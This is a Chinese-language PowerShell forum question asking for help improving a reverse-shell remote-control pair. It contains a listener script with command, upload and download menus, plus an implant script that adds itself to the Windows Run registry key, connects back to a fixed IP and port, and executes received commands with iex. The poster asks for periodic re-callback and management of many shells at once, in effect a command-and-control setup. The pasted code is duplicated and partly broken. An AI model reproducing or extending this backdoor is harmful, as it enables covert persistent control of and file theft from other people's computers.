萌新求助,该怎么样写更好?谢谢大佬


PowerShell交流中心分类: Powershell基础萌新求助,该怎么样写更好?谢谢大佬
0
Hwctak asked 3年 ago

需求是这样的。
1.一共两个ps1脚本
第一个 客户端:监听xxxx端口,服务端则反弹shell到客户端监听端口,然后客户端可以输出cmd,上传下载,等功能。

需求:
1.服务端每隔30秒反弹一次shell到客户端,如果服务端检测到当前与客户端是连接状态则不反弹,如果非链接状态则开始反弹。
2.客户端写一个列表功能,也就是可以支持对服务端反弹回来的多个shell进行批量管理。
萌新:如若有英雄帮忙一下,回头请留下联系方式,红包奉上!

$port=8001

# Create server
$endpoint = New-Object System.Net.IPEndPoint([System.Net.IpAddress]::Any, $port)
$listener = New-Object System.Net.Sockets.TcpListener($endpoint)
$listener.Start()
Write-Host 'Listening on port'$port'...'

# Wait for connection
$client = $listener.AcceptTcpClient()
$stream = $client.GetStream()
$reader = New-Object System.IO.StreamReader($stream)
$writer = New-Object System.IO.StreamWriter($stream)
Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] Connection established !

Function GetBinaryContent($filename){
$file_binary_content = [System.IO.File]::ReadAllBytes($filename)
return $file_binary_content
}

Function ExecCmd(){
echo "Input Command:"
$cmd = Read-Host
$writer.WriteLine($cmd)
$writer.Flush()
$output = $reader.ReadLine()
echo $output
}

Function Upload(){
echo "Input A Local File :"
$local_file = Read-Host
$local_binary_content = GetBinaryContent($local_file)
$local_binary_content_len = $local_binary_content.Length
$file_string_content = [string] $local_binary_content
$writer.WriteLine($file_string_content)
$writer.Flush()
echo "Input Destination :"
$dest_file = Read-Host
$writer.WriteLine($dest_file)
$writer.Flush()
$new_file_len = $reader.ReadLine()
$success = "File Upload Successfully."
$failed = "File Upload Failed."
if($new_file_len -eq $local_binary_content_len){
Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $success
}
elseif($new_file_len -ne $local_binary_content_len){
Write-Host [ -NoNewline;Write-Host * -Fore Red -NoNewline;Write-Host ] $failed
}

}

Function Download(){
echo "Input A Remote File:"
$remote_file = Read-Host
$writer.WriteLine($remote_file)
$writer.Flush()
$remote_file_string_content = $reader.ReadLine()
$remote_file_string_content_split = $remote_file_string_content.Split(" ")
$remote_file_bianry_len = $remote_file_string_content_split.Count
$download_byte_array = New-Object Byte[] $remote_file_bianry_len
for([int]$i = 0; $i -lt $remote_file_bianry_len; $i++){
$download_byte_array[$i] = $remote_file_string_content_split[$i]
}
echo "Input Local Filename :"
$local_filename = Read-Host
[System.IO.File]::WriteAllBytes($local_filename, $download_byte_array)
$new_file_binary_content = [System.IO.File]::ReadAllBytes($local_filename)
$new_file_binary_len = $new_file_binary_content.Count
$writer.WriteLine($new_file_binary_len)
$writer.Flush()
$result = $reader.ReadLine()
Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $result
}

while($true){
echo "[1] Exec Command."
echo "[2] Upload File."
echo "[3] Download File."
echo "[4] Exit."
echo "Input Command Type :"
$cmd_type = Read-Host
if($cmd_type -eq "1"){
$writer.WriteLine($cmd_type)
$writer.Flush()
ExecCmd
}
elseif($cmd_type -eq "2"){
$writer.WriteLine($cmd_type)
$writer.Flush()
Upload
}
elseif($cmd_type -eq "3"){
$writer.WriteLine($cmd_type)
$writer.Flush()
Download
}
elseif($cmd_type -eq "4"){
$writer.WriteLine($cmd_type)
$writer.Flush()
break
}else{
continue
}
echo "========================================"
echo ""
}
kk1$port=8001

# Create server
$endpoint = New-Object System.Net.IPEndPoint([System.Net.IpAddress]::Any, $port)
$listener = New-Object System.Net.Sockets.TcpListener($endpoint)
$listener.Start()
Write-Host 'Listening on port'$port'...'

# Wait for connection
$client = $listener.AcceptTcpClient()
$stream = $client.GetStream()
$reader = New-Object System.IO.StreamReader($stream)
$writer = New-Object System.IO.StreamWriter($stream)
Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] Connection established !

Function GetBinaryContent($filename){
$file_binary_content = [System.IO.File]::ReadAllBytes($filename)
return $file_binary_content
}

Function ExecCmd(){
echo "Input Command:"
$cmd = Read-Host
$writer.WriteLine($cmd)
$writer.Flush()
$output = $reader.ReadLine()
echo $output
}

Function Upload(){
echo "Input A Local File :"
$local_file = Read-Host
$local_binary_content = GetBinaryContent($local_file)
$local_binary_content_len = $local_binary_content.Length
$file_string_content = [string] $local_binary_content
$writer.WriteLine($file_string_content)
$writer.Flush()
echo "Input Destination :"
$dest_file = Read-Host
$writer.WriteLine($dest_file)
$writer.Flush()
$new_file_len = $reader.ReadLine()
$success = "File Upload Successfully."
$failed = "File Upload Failed."
if($new_file_len -eq $local_binary_content_len){
Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $success
}
elseif($new_file_len -ne $local_binary_content_len){
Write-Host [ -NoNewline;Write-Host * -Fore Red -NoNewline;Write-Host ] $failed
}

}

Function Download(){
echo "Input A Remote File:"
$remote_file = Read-Host
$writer.WriteLine($remote_file)
$writer.Flush()
$remote_file_string_content = $reader.ReadLine()
$remote_file_string_content_split = $remote_file_string_content.Split(" ")
$remote_file_bianry_len = $remote_file_string_content_split.Count
$download_byte_array = New-Object Byte[] $remote_file_bianry_len
for([int]$i = 0; $i -lt $remote_file_bianry_len; $i++){
$download_byte_array[$i] = $remote_file_string_content_split[$i]
}
echo "Input Local Filename :"
$local_filename = Read-Host
[System.IO.File]::WriteAllBytes($local_filename, $download_byte_array)
$new_file_binary_content = [System.IO.File]::ReadAllBytes($local_filename)
$new_file_binary_len = $new_file_binary_content.Count
$writer.WriteLine($new_file_binary_len)
$writer.Flush()
$result = $reader.ReadLine()
Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $result
}

while($true){
echo "[1] Exec Command."
echo "[2] Upload File."
echo "[3] Download File."
echo "[4] Exit."
echo "Input Command Type :"
$cmd_type = Read-Host
if($cmd_type -eq "1"){
$writer.WriteLine($cmd_type)
$writer.Flush()
ExecCmd
}
elseif($cmd_type -eq "2"){
$writer.WriteLine($cmd_type)
$writer.Flush()
Upload
}
elseif($cmd_type -eq "3"){
$writer.WriteLine($cmd_type)
$writer.Flush()
Download
}
elseif($cmd_type -eq "4"){
$writer.WriteLine($cmd_type)
$writer.Flush()
break
}else{
continue
}
echo "========================================"
echo ""
}
第二个服务端:
$address = '192.168.1.8'
$port = 8001
 $autorunKeyName = "Windows Powershell"
$autorunKeyVal = $MyInvocation.MyCommand.Path
$autoruns = Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
if (-not $autoruns.$autorunKeyName) {
 New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName -Value $autorunKeyVal
}
elseif($autoruns.$autorunKeyName -ne $autorunKeyVal) {
 Remove-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName
 New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName -Value $autorunKeyVal
}
 while ($true) {
 do {
 try {
 Write-Host “Trying to reach “$address”:”$port
 $client = New-Object System.Net.Sockets.TcpClient($address, $port) 
 $stream = $client.GetStream()
 $writer = New-Object System.IO.StreamWriter($stream)
 $write.
 $reader = New-Object System.IO.StreamReader($stream)
 Start-Sleep -s 10
 }
 catch {
 Write-Host "failed on tcp connect."
 }
 } while ($true)
 Write-Host "Connected"
 do{
 $cmd_type = $reader.ReadLine()
 echo $cmd_type
 if($cmd_type -eq "1"){
 echo "Command Type : Exec Command."
 $cmd = $reader.ReadLine()
 try{ $output = [string](iex $cmd) }
 catch{ $output = $_.Exception.Message }
 $writer.WriteLine($output)
 $writer.Flush()
 }
 elseif($cmd_type -eq "2"){
 echo "Command Type : Upload File."
 $file_string_content = $reader.ReadLine()
 $file_string_content_split = $file_string_content.Split(" ")
 $file_string_content_split_len = $file_string_content_split.Count
 echo $file_string_content_split_len
 $byte_array = New-Object Byte[] $file_string_content_split_len
 for([int] $i = 0; $i -lt $file_string_content_split_len; $i++){
 $byte_array[$i] = $file_string_content_split[$i]
 }
 $dest_file = $reader.ReadLine()
 [System.IO.File]::WriteAllBytes($dest_file, $byte_array)
 $new_file_content = [System.IO.File]::ReadAllBytes($dest_file)
 $new_file_content_len = $new_file_content.Length
 $writer.WriteLine($new_file_content_len)
 $writer.Flush()
 }
 elseif($cmd_type -eq "3"){
 echo "Command Type : Download File."
 $local_file = $reader.ReadLine()
 $local_binary_content = [System.IO.File]::ReadAllBytes($local_file)
 $local_string_content = [string]$local_binary_content
 $writer.WriteLine($local_string_content)
 $writer.Flush()
 $remote_file_len = $reader.ReadLine()
 $local_file_len = $local_binary_content.Count
 if($remote_file_len -eq $local_file_len){
 $writer.WriteLine("Download Successfully.")
 $writer.Flush()
 }
 elseif($remote_file_len -ne $local_file_len){
 $writer.WriteLine("Download Failed.")
 $writer.Flush()
 }
 }
 elseif($cmd_type -eq "4"){
 Write-Host "Exiting"
 $writer.Close()
 $reader.Close()
 $stream.Close()
 $client.Close()
 exit
 break
 }
 else{
 continue
 }
 }while($true)
 # Clean up
 $writer.Close()
 $reader.Close()
 $stream.Close()
 $client.Close()
}
×用微信扫描并分享
Hwctak replied 3年 ago

抱歉,暂时不了解这个编辑器的功能,代码贴错误了。抱歉!